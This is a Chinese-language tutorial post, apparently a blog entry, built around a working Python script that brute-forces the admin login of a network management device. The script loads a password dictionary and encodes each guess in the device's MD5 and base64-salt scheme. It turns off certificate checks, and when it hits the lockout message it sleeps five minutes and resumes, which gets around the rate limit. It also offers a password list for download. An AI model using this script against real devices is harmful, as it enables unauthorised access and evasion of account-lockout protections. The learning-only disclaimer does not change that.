本教程仅作为学习交流,严禁用于违法用途
转载请保留版权
'''
by 一铭
2022/8/19 14:40
自行去分析风控策略,自行去更改,否则使用默认
'''
import requests,json,base64
from hashlib import md5
from time import sleep
# 改成自己网管后台登录地址
url="https://10.1.1.1/Action/login"
# 用户名密码列表文件,wibdows记得双斜杠
path= input("请选择密码字典文件:")
with open(path,'r',encoding="utf-8-sig") as file:
pwd = file.readlines()
file.close()
# 用户名 密码格式
# 如 admin admin123(用户名 密码)一行一个。
# userlist=[]
# for i in pwd:
# i = i.strip().split(" ")
# userlist.append({"name":i[0],"passwd":i[1]})
# 只有密码
# 指定用户名admin,载入密码字典
userlist=[]
for i in pwd:
i = i.strip().split(" ")
userlist.append({"name":"admin","passwd":i[0]})
headers={
"User-Agent": "Mozilla/5.0 (Windows; U; Windows N............214.89 Safari/537.36 UCBrowser/13.9.2.1737 AliApp(TUnionSDK/0.1.20.4)",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Content-Type": "application/json;charset=utf-8",
"Sec-Fetch-Dest": "empty",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Site": "same-origin"
}
# passwd:明文密码md5
# pass:salt_11+明文用户名base64-utf8编码
# remember_password:null,在此处写为None,经过dumps自动转为null
# username:用户名明文
ji = 1
for i in userlist:
name = i['name']
passwd = i['passwd']
data=json.dumps({
"pass": md5(name.encode(encoding='UTF-8')).hexdigest(),
"passwd": base64.b64encode(f"salt_11{passwd}".encode()).decode('utf-8'),
"remember_password": None,
"username": name
})
# 取消https无证书验证警告
requests.packages.urllib3.disable_warnings()
req = requests.post(url=url,headers=headers,data=data,verify=False)
if "账号或密码错误" in req.text:
print(f"第{ji}次用户名或密码错误\t{req.text}")
ji += 1
elif "账号密码错误次数过多" in req.text:
print(f"第{ji}次用户名或密码错误,触发了策略,暂停五分钟继续\t{req.text}")
ji += 1
sleep(300)
else:
print(f"第{ji}次出现了可能需要的结果\n用户名:{name}\t密码:{passwd}\t{req.text}")
break
sleep(0.2) # 10秒一次
预览效果
密码本
点击下载
